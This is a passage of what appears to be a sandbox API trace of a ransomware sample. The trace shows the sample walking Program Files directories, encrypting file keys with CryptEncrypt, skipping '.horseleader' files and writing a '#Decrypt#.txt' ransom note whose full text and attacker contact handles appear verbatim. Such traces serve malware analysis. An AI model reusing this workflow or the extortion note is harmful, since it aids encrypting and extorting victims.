ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf03fdcd7, dwReserved1=0x99178095, cFileName="..", cAlternateFileName="")) returned 1 [0250.921] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.921] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\..") returned 66 [0250.921] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.921] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.921] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf03fdcd7, dwReserved1=0x99178095, cFileName="en-US", cAlternateFileName="")) returned 1 [0250.921] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0250.921] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US") returned 69 [0250.921] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0250.921] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0250.921] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.922] GetProcessHeap () returned 0x780000 [0250.922] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.922] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*") returned 71 [0250.922] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x780150, dwReserved1=0x1ff30e1e, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0250.922] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.922] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\.") returned 71 [0250.922] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.922] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x780150, dwReserved1=0x1ff30e1e, cFileName="..", cAlternateFileName="")) returned 1 [0250.923] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.923] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\..") returned 72 [0250.923] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.923] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.923] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd64fa49b, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x780150, dwReserved1=0x1ff30e1e, cFileName="enu-dsk", cAlternateFileName="")) returned 1 [0250.923] lstrcmpiW (lpString1="enu-dsk", lpString2="Windows") returned -1 [0250.923] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk") returned 77 [0250.923] lstrcmpW (lpString1="enu-dsk", lpString2=".") returned 1 [0250.923] lstrcmpW (lpString1="enu-dsk", lpString2="..") returned 1 [0250.923] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.923] GetProcessHeap () returned 0x780000 [0250.923] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0250.923] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*") returned 79 [0250.924] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*", lpFindFileData=0x32ae6b0 | out: lpFindFileData=0x32ae6b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd64fa49b, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb76ca0d9, dwReserved1=0x6e466024, cFileName=".", cAlternateFileName="")) returned 0x7c68e0 [0250.924] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.924] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\.") returned 79 [0250.924] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.924] FindNextFileW (in: hFindFile=0x7c68e0, lpFindFileData=0x32ae6b0 | out: lpFindFileData=0x32ae6b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd64fa49b, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb76ca0d9, dwReserved1=0x6e466024, cFileName="..", cAlternateFileName="")) returned 1 [0250.924] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.924] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\..") returned 80 [0250.924] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.924] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.924] FindNextFileW (in: hFindFile=0x7c68e0, lpFindFileData=0x32ae6b0 | out: lpFindFileData=0x32ae6b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd64fa49b, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb76ca0d9, dwReserved1=0x6e466024, cFileName="..", cAlternateFileName="")) returned 0 [0250.924] FindClose (in: hFindFile=0x7c68e0 | out: hFindFile=0x7c68e0) returned 1 [0250.925] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\#Decrypt#.txt") returned 91 [0250.925] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.925] GetProcessHeap () returned 0x780000 [0250.925] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0250.925] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc84877a0, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xc84877a0, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x3739a960, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x5b400, dwReserved0=0x780150, dwReserved1=0x1ff30e1e, cFileName="MSTTSFrontendENU.dll", cAlternateFileName="")) returned 1 [0250.925] lstrcmpiW (lpString1="MSTTSFrontendENU.dll", lpString2="Windows") returned -1 [0250.925] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll") returned 90 [0250.925] StrStrIW (lpFirst="MSTTSFrontendENU.dll", lpSrch=".horseleader") returned 0x0 [0250.925] lstrcmpW (lpString1="MSTTSFrontendENU.dll", lpString2="#Decrypt#.txt") returned 1 [0250.925] lstrcmpW (lpString1="MSTTSFrontendENU.dll", lpString2="_uninstalling_.png") returned 1 [0250.925] lstrlenW (lpString=".testttjffg") returned 11 [0250.926] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll", lpSrch=".testttjffg") returned 0x0 [0250.926] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0250.926] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0250.926] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\en-us\\msttsfrontendenu.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.927] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2c77e3, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb2c77e3, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x780150, dwReserved1=0x1ff30e1e, cFileName="MSTTSLoc.dll.mui", cAlternateFileName="")) returned 1 [0250.927] lstrcmpiW (lpString1="MSTTSLoc.dll.mui", lpString2="Windows") returned -1 [0250.927] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui") returned 86 [0250.927] StrStrIW (lpFirst="MSTTSLoc.dll.mui", lpSrch=".horseleader") returned 0x0 [0250.927] lstrcmpW (lpString1="MSTTSLoc.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0250.927] lstrcmpW (lpString1="MSTTSLoc.dll.mui", lpString2="_uninstalling_.png") returned 1 [0250.927] lstrlenW (lpString=".testttjffg") returned 11 [0250.928] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui", lpSrch=".testttjffg") returned 0x0 [0250.928] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0250.928] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0250.928] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\en-us\\msttsloc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.928] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2c77e3, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb2c77e3, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x780150, dwReserved1=0x1ff30e1e, cFileName="MSTTSLoc.dll.mui", cAlternateFileName="")) returned 0 [0250.928] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0250.928] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\#Decrypt#.txt") returned 83 [0250.928] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.929] GetProcessHeap () returned 0x780000 [0250.929] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.929] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc536f5be, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xc536f5be, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x36fbb600, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xa200, dwReserved0=0xf03fdcd7, dwReserved1=0x99178095, cFileName="MSTTSCommon.dll", cAlternateFileName="")) returned 1 [0250.929] lstrcmpiW (lpString1="MSTTSCommon.dll", lpString2="Windows") returned -1 [0250.929] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll") returned 79 [0250.929] StrStrIW (lpFirst="MSTTSCommon.dll", lpSrch=".horseleader") returned 0x0 [0250.929] lstrcmpW (lpString1="MSTTSCommon.dll", lpString2="#Decrypt#.txt") returned 1 [0250.929] lstrcmpW (lpString1="MSTTSCommon.dll", lpString2="_uninstalling_.png") returned 1 [0250.929] lstrlenW (lpString=".testttjffg") returned 11 [0250.929] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll", lpSrch=".testttjffg") returned 0x0 [0250.930] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.930] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.930] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\msttscommon.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.930] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc982ab94, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xc982ab94, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x3702e1f0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x2c400, dwReserved0=0xf03fdcd7, dwReserved1=0x99178095, cFileName="MSTTSEngine.dll", cAlternateFileName="")) returned 1 [0250.930] lstrcmpiW (lpString1="MSTTSEngine.dll", lpString2="Windows") returned -1 [0250.930] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll") returned 79 [0250.930] StrStrIW (lpFirst="MSTTSEngine.dll", lpSrch=".horseleader") returned 0x0 [0250.930] lstrcmpW (lpString1="MSTTSEngine.dll", lpString2="#Decrypt#.txt") returned 1 [0250.930] lstrcmpW (lpString1="MSTTSEngine.dll", lpString2="_uninstalling_.png") returned 1 [0250.930] lstrlenW (lpString=".testttjffg") returned 11 [0250.931] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll", lpSrch=".testttjffg") returned 0x0 [0250.931] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.931] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.931] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\msttsengine.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.931] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6d522f4, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xc6d522f4, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x3739a960, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0xf03fdcd7, dwReserved1=0x99178095, cFileName="MSTTSLoc.dll", cAlternateFileName="")) returned 1 [0250.931] lstrcmpiW (lpString1="MSTTSLoc.dll", lpString2="Windows") returned -1 [0250.931] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll") returned 76 [0250.931] StrStrIW (lpFirst="MSTTSLoc.dll", lpSrch=".horseleader") returned 0x0 [0250.931] lstrcmpW (lpString1="MSTTSLoc.dll", lpString2="#Decrypt#.txt") returned 1 [0250.931] lstrcmpW (lpString1="MSTTSLoc.dll", lpString2="_uninstalling_.png") returned 1 [0250.932] lstrlenW (lpString=".testttjffg") returned 11 [0250.932] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll", lpSrch=".testttjffg") returned 0x0 [0250.932] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.932] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.932] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\msttsloc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.932] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6d522f4, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xc6d522f4, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x3739a960, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0xf03fdcd7, dwReserved1=0x99178095, cFileName="MSTTSLoc.dll", cAlternateFileName="")) returned 0 [0250.932] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0250.932] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\#Decrypt#.txt") returned 77 [0250.932] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.933] GetProcessHeap () returned 0x780000 [0250.933] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0250.933] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="TTS20", cAlternateFileName="")) returned 0 [0250.933] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0250.933] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\#Decrypt#.txt") returned 71 [0250.933] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0250.934] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0250.934] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0250.936] lstrlenA 